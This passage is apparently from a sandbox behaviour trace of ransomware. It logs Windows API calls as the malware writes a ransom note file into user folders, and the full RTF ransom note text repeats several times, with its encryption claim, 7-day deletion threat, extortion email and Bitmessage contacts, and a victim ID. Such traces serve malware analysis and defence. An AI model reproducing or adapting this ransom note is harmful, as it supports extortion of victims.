worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.064] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.065] CloseHandle (hObject=0x294) returned 1 [0285.065] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0285.065] GetLastError () returned 0x2 [0285.065] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.066] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.066] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto 